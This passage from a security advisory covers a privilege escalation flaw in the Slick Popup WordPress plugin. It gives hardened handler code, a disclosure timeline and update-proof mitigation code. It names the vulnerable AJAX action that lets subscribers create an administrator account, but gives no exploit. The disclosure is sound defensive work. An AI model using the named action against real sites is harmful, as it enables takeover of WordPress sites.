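For contrast, here is how the same support-access handler looks once both defects are addressed: a capability check and nonce in front of the action, and no fixed password at all (the vendor receives a password-reset link instead). This is an added illustration, not Om Ak Solutions' patch; the nonce action name and the response shape are assumptions.

```php
<?php
// Added example of a hardened handler; hook and callback names are the ones the post quotes,
// the nonce action 'splite_support_nonce' and the messages are assumed.
add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );
function action_splite_support_access() {
    // 1. Authorization: only a user who may create users can grant support access.
    if ( ! current_user_can( 'create_users' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }
    // 2. CSRF protection: the request must carry a nonce issued to this admin.
    check_ajax_referer( 'splite_support_nonce', 'nonce' );

    $login = 'slickpopupteam';
    $email = 'poke@slickpopup.com';
    if ( username_exists( $login ) || email_exists( $email ) ) {
        wp_send_json_error( array( 'message' => 'Support user already exists.' ), 409 );
    }

    // 3. No hard-coded secret: a random password that is never shown to anyone.
    $user_id = wp_create_user( $login, wp_generate_password( 32, true, true ), $email );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( array( 'message' => $user_id->get_error_message() ), 500 );
    }
    $user = new WP_User( $user_id );
    $user->set_role( 'administrator' );

    // 4. Hand over access via a single-use reset link instead of a shared password.
    $key = get_password_reset_key( $user );
    if ( is_wp_error( $key ) ) {
        wp_send_json_error( array( 'message' => $key->get_error_message() ), 500 );
    }
    $reset_url = network_site_url(
        'wp-login.php?action=rp&key=' . $key . '&login=' . rawurlencode( $login ),
        'login'
    );
    wp_mail( $email, 'Support access granted on ' . home_url(), "Set your password here: $reset_url" );

    wp_send_json_success( array( 'user_id' => $user_id ) );
}
```

Even with these checks in place, a site owner should still audit administrator accounts after granting support access, since the account persists until someone removes it.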

During our research we identified that the user creation script used by this plugin is somewhat popular, and can be found in several GitHub gists like this one. We searched the WordPress.org plugin repository for other uses of this script and found another one of Om Ak Solution’s plugins, Contact Form 7 Spam Blocker. We included this additional plugin in our report to the developer.

Private Disclosure Timeline

  • April 22 – Vulnerability disclosed to Om Ak Solutions.
  • April 25 – WAF rule released to protect Wordfence Premium users from attacks on this flaw.
  • April 27 – Developer acknowledges issue and states a patch will be released.
  • May 14 – Slick Popup version 1.7.1 released – issue unresolved in this patch.
  • May 22 – Public disclosure deadline.
  • May 25 – WAF rule released for free users.

Shortly before the writing of this article, a representative of Om Ak Solutions claimed a patch has been released for the Pro version of Slick Popup and that a patch for the free version is in progress. The reported patch of the Pro version has not been tested by the Wordfence team at this time.

Next Steps

As mentioned above, Slick Popup versions up to and including 1.7.1 are vulnerable. It is our recommendation that users of the plugin deactivate or delete the plugin until a patch is available.

However, it’s possible to deactivate the vulnerable Support Access feature on current versions of the plugin without affecting the rest of the plugin’s functionality. Doing this requires making a small change to the plugin’s files, and you should note a few things beforehand:

  • This will break the plugin’s ability to grant support access to Om Ak Solutions.
  • Any updates to the plugin will overwrite this change and reactivate the feature.
  • This will not remove an existing slickpopupteam user, legitimate or otherwise. That will need to be done manually if one is present.
  • We cannot provide support for implementing this short-term fix, nor can we assist with other issues that may arise during the process.

To prevent the creation of these users, all you need to do is comment out the line where the action_splite_support_access AJAX action is registered. In the latest version of the plugin, this is on line 523 of the file /libs/admin-pages.php.

Before:

add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );

After:

//add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );
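Because a plugin update overwrites the edit above, the same effect can be achieved from a must-use plugin that survives updates: it unhooks the registered action, short-circuits the AJAX request if anything re-registers it, and warns administrators when a slickpopupteam account exists (removal stays a manual step, as noted above). This is an added example, not a Wordfence or Om Ak Solutions file; the file name and notice wording are assumptions.

```php
<?php
/**
 * Plugin Name: Disable Slick Popup support access (added example)
 * Description: Place in wp-content/mu-plugins/ (assumed path); mu-plugins are not touched by plugin updates.
 */

// Unhook the vulnerable action after all plugins have registered their hooks.
// The plugin registers it at the default priority 10 with the names quoted in the post.
add_action( 'init', function () {
    remove_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access', 10 );
}, 20 );

// Defence in depth: if the action still fires, stop it before any user is created.
// wp_send_json_error() ends the request, so later callbacks never run.
add_action( 'wp_ajax_action_splite_support_access', function () {
    wp_send_json_error( array( 'message' => 'Support access is disabled on this site.' ), 403 );
}, 1 );

// Surface an existing slickpopupteam account to administrators for manual review.
add_action( 'admin_notices', function () {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    $user = get_user_by( 'login', 'slickpopupteam' );
    if ( ! $user ) {
        return;
    }
    $message = sprintf(
        'A "slickpopupteam" account exists (ID %d, role %s). Confirm it is legitimate or remove it.',
        $user->ID,
        implode( ', ', $user->roles )
    );
    printf( '<div class="notice notice-error"><p>%s</p></div>', esc_html( $message ) );
} );
```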

Conclusion

In this post, we detailed an unpatched privilege escalation flaw in the Slick Popup plugin which allows subscribers to gain administrative access to an affected WordPress site. Because of the relatively small userbase of the plugin, and the authentication necessary to exploit it, we do not anticipate widespread attack campaigns leveraging this vulnerability. A Firewall rule to protect against attempts to exploit this vulnerability was released on April 25th and is currently available for sites running Wordfence Premium as well as the free version.

The post Privilege Escalation Flaw Present In Slick Popup Plugin appeared first on Wordfence.
